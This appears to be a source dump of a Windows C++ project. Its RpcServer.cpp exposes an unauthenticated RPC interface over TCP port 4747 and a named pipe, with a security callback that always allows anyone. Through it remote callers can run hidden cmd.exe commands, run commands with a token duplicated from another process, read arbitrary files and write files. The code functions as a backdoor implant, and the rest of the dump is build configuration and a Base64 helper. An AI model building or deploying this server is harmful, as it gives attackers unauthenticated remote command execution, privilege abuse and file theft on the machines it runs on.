DEALINGS IN THE SOFTWARE. 26 | */ 27 | 28 | #include 29 | 30 | namespace macaron { 31 | 32 | class Base64 { 33 | public: 34 | 35 | static std::string Encode(char* data, int length) { 36 | static constexpr char sEncodingTable[] = { 37 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 38 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 39 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 40 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 41 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 42 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 43 | 'w', 'x', 'y', 'z', '0', '1', '2', '3', 44 | '4', '5', '6', '7', '8', '9', '+', '/' 45 | }; 46 | 47 | size_t in_len = length;//data.size(); 48 | size_t out_len = 4 * ((in_len + 2) / 3); 49 | std::string ret(out_len, '\0'); 50 | size_t i; 51 | char* p = const_cast(ret.c_str()); 52 | 53 | for (i = 0; i < in_len - 2; i += 3) { 54 | *p++ = sEncodingTable[(data[i] >> 2) & 0x3F]; 55 | *p++ = sEncodingTable[((data[i] & 0x3) << 4) | ((int)(data[i + 1] & 0xF0) >> 4)]; 56 | *p++ = sEncodingTable[((data[i + 1] & 0xF) << 2) | ((int)(data[i + 2] & 0xC0) >> 6)]; 57 | *p++ = sEncodingTable[data[i + 2] & 0x3F]; 58 | } 59 | if (i < in_len) { 60 | *p++ = sEncodingTable[(data[i] >> 2) & 0x3F]; 61 | if (i == (in_len - 1)) { 62 | *p++ = sEncodingTable[((data[i] & 0x3) << 4)]; 63 | *p++ = '='; 64 | } 65 | else { 66 | *p++ = sEncodingTable[((data[i] & 0x3) << 4) | ((int)(data[i + 1] & 0xF0) >> 4)]; 67 | *p++ = sEncodingTable[((data[i + 1] & 0xF) << 2)]; 68 | } 69 | *p++ = '='; 70 | } 71 | 72 | return ret; 73 | } 74 | 75 | static int Decode(const std::string& input, char** out) { 76 | static constexpr unsigned char kDecodingTable[] = { 77 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 78 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 79 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 80 | 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 81 | 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 82 | 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 83 | 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 84 | 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 85 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 86 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 87 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 88 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 89 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 90 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 91 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 92 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 93 | }; 94 | 95 | size_t in_len = input.size(); 96 | if (in_len % 4 != 0) return -1; 97 | 98 | size_t out_len = in_len / 4 * 3; 99 | if (input[in_len - 1] == '=') out_len--; 100 | if (input[in_len - 2] == '=') out_len--; 101 | 102 | //out.resize(out_len); 103 | *out = new char[out_len]; 104 | 105 | for (size_t i = 0, j = 0; i < in_len;) { 106 | uint32_t a = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 107 | uint32_t b = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 108 | uint32_t c = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 109 | uint32_t d = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 110 | 111 | uint32_t triple = (a << 3 * 6) + (b << 2 * 6) + (c << 1 * 6) + (d << 0 * 6); 112 | 113 | if (j < out_len) (*out)[j++] = (triple >> 2 * 8) & 0xFF; 114 | if (j < out_len) (*out)[j++] = (triple >> 1 * 8) & 0xFF; 115 | if (j < out_len) (*out)[j++] = (triple >> 0 * 8) & 0xFF; 116 | } 117 | 118 | return out_len; 119 | } 120 | 121 | }; 122 | 123 | } 124 | 125 | #endif /* _MACARON_BASE64_H_ */ -------------------------------------------------------------------------------- /RpcServer/RpcServer.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "../RpcServerInterface/RpcServerInterface.h" 5 | #include "../RpcServerInterface2/RpcServerInterface2.h" 6 | #include 7 | #include 8 | #include "Base64.h" 9 | 10 | void Execute(LPSTR* Command, LPSTR* Output) 11 | { 12 | // Prepebd "cmd.exe /c " to the command 13 | std::string command_with_prefix = std::string("cmd.exe /c ") + std::string(*Command); 14 | 15 | // Create pipes to read STDOUT 16 | HANDLE hPipeRead, hPipeWrite; 17 | SECURITY_ATTRIBUTES saAttr = { sizeof(SECURITY_ATTRIBUTES) }; 18 | saAttr.bInheritHandle = TRUE; 19 | saAttr.lpSecurityDescriptor = NULL; 20 | 21 | if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0)) 22 | { 23 | *Output = strdup("Execute Failed"); 24 | return; 25 | } 26 | 27 | // Prepare structs for CreateProcess 28 | STARTUPINFOA startupInfo = { sizeof(STARTUPINFOA) }; 29 | startupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 30 | startupInfo.hStdOutput = hPipeWrite; 31 | startupInfo.hStdError = hPipeWrite; 32 | startupInfo.wShowWindow = SW_HIDE; 33 | startupInfo.dwFlags |= STARTF_USESHOWWINDOW; 34 | 35 | PROCESS_INFORMATION processInformation = { 0 }; 36 | 37 | // Execute the command 38 | BOOL fSuccess = CreateProcessA(NULL, (LPSTR)command_with_prefix.c_str(), NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &startupInfo, &processInformation); 39 | if (!fSuccess) 40 | { 41 | CloseHandle(hPipeWrite); 42 | CloseHandle(hPipeRead); 43 | *Output = strdup("Execute Failed"); 44 | return; 45 | } 46 | 47 | // Read the output until the process terminates 48 | std::string output; 49 | bool bProcessEnded = false; 50 | while (!bProcessEnded) 51 | { 52 | bProcessEnded = WaitForSingleObject(processInformation.hProcess, 100) == WAIT_OBJECT_0; 53 | 54 | while(true) 55 | { 56 | char buf[1024]; 57 | DWORD dwRead = 0; 58 | DWORD dwAvail = 0; 59 | 60 | if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL)) 61 | break; 62 | 63 | if (!dwAvail) 64 | break; 65 | 66 | if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead) 67 | break; 68 | 69 | buf[dwRead] = 0; 70 | output += std::string(buf); 71 | } 72 | } 73 | 74 | // Clean up 75 | CloseHandle(hPipeWrite); 76 | CloseHandle(hPipeRead); 77 | CloseHandle(processInformation.hProcess); 78 | CloseHandle(processInformation.hThread); 79 | 80 | *Output = strdup(output.c_str()); 81 | } 82 | 83 | void ExecuteWithToken(LPSTR* Command, int ProcessId, LPSTR* Output) 84 | { 85 | // We need to convert the command to unicode for CreateProcessWithTokenW 86 | std::string command = std::string("/c ") + std::string(*Command); 87 | std::wstring command_w; 88 | command_w.assign(command.begin(), command.end()); 89 | 90 | // Create pipes to read STDOUT 91 | HANDLE hPipeRead, hPipeWrite; 92 | SECURITY_ATTRIBUTES saAttr = { sizeof(SECURITY_ATTRIBUTES) }; 93 | saAttr.bInheritHandle = TRUE; // Pipe handles are inherited by child process. 94 | saAttr.lpSecurityDescriptor = NULL; 95 | 96 | if (!CreatePipe(&hPipeRead, &hPipeWrite, &saAttr, 0)) 97 | { 98 | wprintf(L"Executtion failed (Error: %d).\n", GetLastError()); 99 | *Output = strdup("Execution failed"); 100 | return; 101 | } 102 | 103 | HANDLE tokenHandle = NULL; 104 | HANDLE duplicateTokenHandle = NULL; 105 | // Call OpenProcess to get a process handle 106 | HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION, true, ProcessId); 107 | if (GetLastError() == NULL) 108 | printf("[+] OpenProcess() success!\n"); 109 | else 110 | { 111 | printf("[-] OpenProcess() Return Code: %i\n", processHandle); 112 | printf("[-] OpenProcess() Error: %i\n", GetLastError()); 113 | } 114 | 115 | // Call OpenProcessToken() to get a handle for the process token 116 | BOOL getToken = OpenProcessToken(processHandle, TOKEN_DUPLICATE, &tokenHandle); 117 | if (GetLastError() == NULL) 118 | printf("[+] OpenProcessToken() success!\n"); 119 | else 120 | { 121 | printf("[-] OpenProcessToken() Return Code: %i\n", getToken); 122 | printf("[-] OpenProcessToken() Error: %i\n", GetLastError()); 123 | } 124 | 125 | // Duplicate the process token 126 | BOOL duplicateToken = DuplicateTokenEx(tokenHandle, TOKEN_ADJUST_DEFAULT | TOKEN_ADJUST_SESSIONID | TOKEN_QUERY | TOKEN_DUPLICATE | TOKEN_ASSIGN_PRIMARY, NULL, SecurityImpersonation, TokenPrimary, &duplicateTokenHandle); 127 | if (GetLastError() == NULL) 128 | printf("[+] DuplicateTokenEx() success!\n"); 129 | else 130 | { 131 | printf("[-] DuplicateTokenEx() Return Code: %i\n", duplicateToken); 132 | printf("[-] DupicateTokenEx() Error: %i\n", GetLastError()); 133 | } 134 | 135 | // Prepare structs for CreateProcessWithTokenW 136 | STARTUPINFOW startupInfo = { sizeof(STARTUPINFOW) }; 137 | startupInfo.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES; 138 | startupInfo.hStdOutput = hPipeWrite; 139 | startupInfo.hStdError = hPipeWrite; 140 | startupInfo.wShowWindow = SW_HIDE; 141 | startupInfo.dwFlags |= STARTF_USESHOWWINDOW; 142 | 143 | PROCESS_INFORMATION processInformation = { 0 }; 144 | // Call CreateProcessWithTokenW 145 | BOOL createProcess = CreateProcessWithTokenW(duplicateTokenHandle, 0, L"cmd.exe", (LPWSTR)command_w.c_str(), 0, NULL, NULL, &startupInfo, &processInformation); 146 | if (GetLastError() == NULL) 147 | printf("[+] Process spawned!\n"); 148 | else 149 | { 150 | printf("[-] CreateProcessWithTokenW Return Code: %i\n", createProcess); 151 | printf("[-] CreateProcessWithTokenW Error: %i\n", GetLastError()); 152 | } 153 | 154 | if (!createProcess) { 155 | *Output = strdup("ExecuteWithToken Failed"); 156 | return; 157 | } 158 | 159 | // Read the output until the process terminates 160 | std::string output; 161 | bool bProcessEnded = false; 162 | while(!bProcessEnded) 163 | { 164 | bProcessEnded = WaitForSingleObject(processInformation.hProcess, 100) == WAIT_OBJECT_0; 165 | 166 | while (true) 167 | { 168 | char buf[1024]; 169 | DWORD dwRead = 0; 170 | DWORD dwAvail = 0; 171 | 172 | if (!::PeekNamedPipe(hPipeRead, NULL, 0, NULL, &dwAvail, NULL)) 173 | break; 174 | 175 | if (!dwAvail) 176 | break; 177 | 178 | if (!::ReadFile(hPipeRead, buf, min(sizeof(buf) - 1, dwAvail), &dwRead, NULL) || !dwRead) 179 | break; 180 | 181 | buf[dwRead] = 0; 182 | output += std::string(buf); 183 | } 184 | } 185 | 186 | // Clean up 187 | CloseHandle(processHandle); 188 | CloseHandle(tokenHandle); 189 | CloseHandle(duplicateTokenHandle); 190 | CloseHandle(hPipeWrite); 191 | CloseHandle(hPipeRead); 192 | CloseHandle(processInformation.hProcess); 193 | CloseHandle(processInformation.hThread); 194 | 195 | *Output = strdup(output.c_str()); 196 | } 197 | 198 | static char* ReadFile(LPSTR filename, int* length) 199 | { 200 | size_t size; 201 | 202 | // Open the file 203 | std::ifstream ifs(filename, std::ios::in | std::ios::binary | std::ios::ate); 204 | if (!ifs.is_open()) 205 | { 206 | *length = -1; 207 | return NULL; 208 | } 209 | 210 | // Get the file size 211 | ifs.seekg(0, std::ios::end); 212 | size = ifs.tellg(); 213 | ifs.seekg(0, std::ios::beg); 214 | char* pChars = new char[size]; 215 | 216 | // Read all bytes 217 | ifs.read(pChars, size); 218 | 219 | // Close the file and return the content and length 220 | ifs.close(); 221 | *length = size; 222 | 223 | // Base64 encode the file and return it 224 | std::string encoded = pChars; 225 | macaron::Base64 encoder; 226 | encoded = encoder.Encode(pChars, *length); 227 | 228 | return strdup(encoded.c_str()); 229 | } 230 | 231 | void Download(LPSTR* Path, LPSTR* Data) 232 | { 233 | int length = -1; 234 | *Data = ReadFile(*Path, &length); 235 | } 236 | 237 | void SaveFile(LPSTR path, char* buffer) 238 | { 239 | // Base64 decode the data 240 | macaron::Base64 encoder; 241 | char* decoded; 242 | int length; 243 | length = encoder.Decode(buffer, &decoded); 244 | 245 | // Save the data to the specified path 246 | std::ofstream ofs(path, std::ios::out | std::ios::binary); 247 | ofs.write(decoded, length); 248 | ofs.close(); 249 | } 250 | 251 | void Upload(LPSTR* Path, LPSTR* Data) 252 | { 253 | SaveFile(*Path, *Data); 254 | } 255 | 256 | void Shutdown() 257 | { 258 | RPC_STATUS status; 259 | 260 | status = RpcMgmtStopServerListening(NULL); 261 | 262 | if (status) 263 | { 264 | exit(status); 265 | } 266 | 267 | status = RpcServerUnregisterIf(NULL, NULL, FALSE); 268 | 269 | if (status) 270 | { 271 | exit(status); 272 | } 273 | 274 | ExitThread(0); 275 | } 276 | void Shutdown2() 277 | { 278 | Shutdown(); 279 | } 280 | 281 | RPC_STATUS CALLBACK SecurityCallback(RPC_IF_HANDLE, void*) 282 | { 283 | return RPC_S_OK; // Always allow anyone 284 | } 285 | 286 | int main() 287 | { 288 | RPC_STATUS status; 289 | 290 | // Register TCP/IP endpoint 291 | status = RpcServerUseProtseqEp( 292 | (RPC_CSTR)"ncacn_ip_tcp", 293 | RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 294 | (RPC_CSTR)"4747", // TCP/IP port to use. 295 | NULL); 296 | 297 | if (status) 298 | exit(status); 299 | 300 | // Registers the first interface 301 | status = RpcServerRegisterIf2( 302 | RpcServerInterface_v1_0_s_ifspec, 303 | NULL, 304 | NULL, 305 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, 306 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, 307 | (unsigned)-1, 308 | SecurityCallback); 309 | 310 | if (status) 311 | exit(status); 312 | 313 | // Register named pipes endpoint 314 | status = RpcServerUseProtseqEp( 315 | (RPC_CSTR)"ncacn_np", 316 | RPC_C_PROTSEQ_MAX_REQS_DEFAULT, 317 | (RPC_CSTR)"\\pipe\\atctl", // Hard-coded pipe name 318 | NULL); 319 | 320 | if (status) 321 | exit(status); 322 | 323 | // Registers the second interface 324 | status = RpcServerRegisterIf2( 325 | RpcServerInterface2_v1_0_s_ifspec, 326 | NULL, 327 | NULL, 328 | RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH, 329 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, 330 | (unsigned)-1, 331 | SecurityCallback); 332 | 333 | if (status) 334 | exit(status); 335 | 336 | // Start to listen for remote procedure calls for all registered interfaces 337 | status = RpcServerListen( 338 | 2, // Recommended minimum number of threads 339 | RPC_C_LISTEN_MAX_CALLS_DEFAULT, // Recommended maximum number of threads 340 | FALSE); 341 | 342 | if (status) 343 | exit(status); 344 | } 345 | 346 | void* __RPC_USER midl_user_allocate(size_t size) 347 | { 348 | return malloc(size); 349 | } 350 | 351 | void __RPC_USER midl_user_free(void* p) 352 | { 353 | free(p); 354 | } 355 | -------------------------------------------------------------------------------- /RpcServer/RpcServer.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {758DB128-9123-4E1B-A6C3-47323714123A} 23 | Win32Proj 24 | RpcServer 25 | 10.0 26 | 27 | 28 | 29 | Application 30 | MultiByte 31 | v143 32 | 33 | 34 | Application 35 | MultiByte 36 | v143 37 | 38 | 39 | Application 40 | MultiByte 41 | v143 42 | 43 | 44 | Application 45 | MultiByte 46 | v143 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | <_ProjectFileVersion>10.0.40219.1 66 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 67 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 68 | true 69 | true 70 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 71 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 72 | false 73 | false 74 | 75 | 76 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 77 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 78 | 79 | 80 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 81 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 82 | 83 | 84 | 85 | Disabled 86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 87 | true 88 | EnableFastChecks 89 | MultiThreadedDebug 90 | true 91 | true 92 | true 93 | 94 | 95 | Level4 96 | EditAndContinue 97 | 98 | 99 | rpcrt4.lib;%(AdditionalDependencies) 100 | $(OutDir)RpcServer.exe 101 | true 102 | $(OutDir)RpcServer.pdb 103 | Console 104 | MachineX86 105 | 106 | 107 | 108 | 109 | Disabled 110 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 111 | EnableFastChecks 112 | MultiThreadedDebug 113 | true 114 | true 115 | true 116 | 117 | 118 | Level4 119 | ProgramDatabase 120 | 121 | 122 | rpcrt4.lib;%(AdditionalDependencies) 123 | $(OutDir)RpcServer.exe 124 | true 125 | $(OutDir)RpcServer.pdb 126 | Console 127 | 128 | 129 | 130 | 131 | MaxSpeed 132 | OnlyExplicitInline 133 | true 134 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 135 | true 136 | MultiThreaded 137 | true 138 | true 139 | true 140 | true 141 | 142 | 143 | Level4 144 | ProgramDatabase 145 | 146 | 147 | rpcrt4.lib;%(AdditionalDependencies) 148 | $(OutDir)RpcServer.exe 149 | true 150 | Console 151 | true 152 | true 153 | MachineX86 154 | 155 | 156 | 157 | 158 | MaxSpeed 159 | OnlyExplicitInline 160 | true 161 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 162 | true 163 | MultiThreaded 164 | true 165 | true 166 | true 167 | true 168 | 169 | 170 | Level4 171 | ProgramDatabase 172 | 173 | 174 | rpcrt4.lib;%(AdditionalDependencies) 175 | $(OutDir)RpcServer.exe 176 | true 177 | Console 178 | true 179 | true 180 | 181 | 182 | 183 | 184 | 185 | 186 | Level3 187 | Level3 188 | Level3 189 | Level3 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | 198 | 199 | {8558952e-c76b-4976-949f-76a977da7f8a} 200 | 201 | 202 | {6536ebec-014e-4d6b-97be-223137694ca8} 203 | 204 | 205 | 206 | 207 | 208 | -------------------------------------------------------------------------------- /RpcServer/RpcServer.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /RpcServerDll/Base64.h: -------------------------------------------------------------------------------- 1 | #ifndef _MACARON_BASE64_H_ 2 | #define _MACARON_BASE64_H_ 3 | 4 | /** 5 | * The MIT License (MIT) 6 | * Copyright (c) 2016 tomykaira 7 | * 8 | * Permission is hereby granted, free of charge, to any person obtaining 9 | * a copy of this software and associated documentation files (the 10 | * "Software"), to deal in the Software without restriction, including 11 | * without limitation the rights to use, copy, modify, merge, publish, 12 | * distribute, sublicense, and/or sell copies of the Software, and to 13 | * permit persons to whom the Software is furnished to do so, subject to 14 | * the following conditions: 15 | * 16 | * The above copyright notice and this permission notice shall be 17 | * included in all copies or substantial portions of the Software. 18 | * 19 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 20 | * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 21 | * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 22 | * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 23 | * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 24 | * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 25 | * WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 26 | */ 27 | 28 | #include 29 | 30 | namespace macaron { 31 | 32 | class Base64 { 33 | public: 34 | 35 | static std::string Encode(char* data, int length) { 36 | static constexpr char sEncodingTable[] = { 37 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 38 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 39 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 40 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 41 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 42 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 43 | 'w', 'x', 'y', 'z', '0', '1', '2', '3', 44 | '4', '5', '6', '7', '8', '9', '+', '/' 45 | }; 46 | 47 | size_t in_len = length;//data.size(); 48 | size_t out_len = 4 * ((in_len + 2) / 3); 49 | std::string ret(out_len, '\0'); 50 | size_t i; 51 | char* p = const_cast(ret.c_str()); 52 | 53 | for (i = 0; i < in_len - 2; i += 3) { 54 | *p++ = sEncodingTable[(data[i] >> 2) & 0x3F]; 55 | *p++ = sEncodingTable[((data[i] & 0x3) << 4) | ((int)(data[i + 1] & 0xF0) >> 4)]; 56 | *p++ = sEncodingTable[((data[i + 1] & 0xF) << 2) | ((int)(data[i + 2] & 0xC0) >> 6)]; 57 | *p++ = sEncodingTable[data[i + 2] & 0x3F]; 58 | } 59 | if (i < in_len) { 60 | *p++ = sEncodingTable[(data[i] >> 2) & 0x3F]; 61 | if (i == (in_len - 1)) { 62 | *p++ = sEncodingTable[((data[i] & 0x3) << 4)]; 63 | *p++ = '='; 64 | } 65 | else { 66 | *p++ = sEncodingTable[((data[i] & 0x3) << 4) | ((int)(data[i + 1] & 0xF0) >> 4)]; 67 | *p++ = sEncodingTable[((data[i + 1] & 0xF) << 2)]; 68 | } 69 | *p++ = '='; 70 | } 71 | 72 | return ret; 73 | } 74 | 75 | static int Decode(const std::string& input, char** out) { 76 | static constexpr unsigned char kDecodingTable[] = { 77 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 78 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 79 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 62, 64, 64, 64, 63, 80 | 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 64, 64, 64, 64, 64, 64, 81 | 64, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 82 | 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 64, 64, 64, 64, 64, 83 | 64, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 84 | 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 64, 64, 64, 64, 64, 85 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 86 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 87 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 88 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 89 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 90 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 91 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 92 | 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64, 64 93 | }; 94 | 95 | size_t in_len = input.size(); 96 | if (in_len % 4 != 0) return -1; 97 | 98 | size_t out_len = in_len / 4 * 3; 99 | if (input[in_len - 1] == '=') out_len--; 100 | if (input[in_len - 2] == '=') out_len--; 101 | 102 | //out.resize(out_len); 103 | *out = new char[out_len]; 104 | 105 | for (size_t i = 0, j = 0; i < in_len;) { 106 | uint32_t a = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 107 | uint32_t b = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 108 | uint32_t c = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 109 | uint32_t d = input[i] == '=' ? 0 & i++ : kDecodingTable[static_cast(input[i++])]; 110 | 111 | uint32_t triple = (a << 3 * 6) + (b << 2 * 6) + (c << 1 * 6) + (d << 0 * 6); 112 | 113 | if (j < out_len) (*out)[j++] = (triple >> 2 * 8) & 0xFF; 114 | if (j < out_len) (*out)[j++] = (triple >> 1 * 8) & 0xFF; 115 | if (j < out_len) (*out)[j++] = (triple >> 0 * 8) & 0xFF; 116 | } 117 | 118 | return out_len; 119 | } 120 | 121 | }; 122 | 123 | } 124 | 125 | #endif /* _MACARON_BASE64_H_ */ -------------------------------------------------------------------------------- /RpcServerDll/RpcServerDll.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {3c21f82b-b958-457a-82bb-b8a795316d3d} 25 | RpcServerDll 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 75 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 76 | 77 | 78 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 79 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 80 | 81 | 82 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 83 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 84 | 85 | 86 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 87 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 88 | 89 | 90 | 91 | Level3 92 | true 93 | WIN32;_DEBUG;RpcServerDll_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 94 | true 95 | NotUsing 96 | pch.h 97 | 4996 98 | 99 | 100 | Windows 101 | true 102 | false 103 | rpcrt4.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 104 | 105 | 106 | 107 | 108 | Level3 109 | true 110 | true 111 | true 112 | WIN32;NDEBUG;RpcServerDll_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 113 | true 114 | NotUsing 115 | pch.h 116 | 4996 117 | 118 | 119 | Windows 120 | true 121 | true 122 | true 123 | false 124 | rpcrt4.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 125 | 126 | 127 | 128 | 129 | Level3 130 | true 131 | _DEBUG;RpcServerDll_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 132 | true 133 | NotUsing 134 | pch.h 135 | 4996 136 | 137 | 138 | Windows 139 | true 140 | false 141 | rpcrt4.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 142 | 143 | 144 | 145 | 146 | Level3 147 | true 148 | true 149 | true 150 | NDEBUG;RpcServerDll_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 151 | true 152 | NotUsing 153 | pch.h 154 | 4996 155 | 156 | 157 | Windows 158 | true 159 | true 160 | true 161 | false 162 | rpcrt4.lib;$(CoreLibraryDependencies);%(AdditionalDependencies) 163 | 164 | 165 | 166 | 167 | 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | Create 178 | Create 179 | Create 180 | Create 181 | 182 | 183 | 184 | 185 | {8558952e-c76b-4976-949f-76a977da7f8a} 186 | 187 | 188 | {6536ebec-014e-4d6b-97be-223137694ca8} 189 | 190 | 191 | 192 | 193 | 194 | -------------------------------------------------------------------------------- /RpcServerDll/RpcServerDll.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | 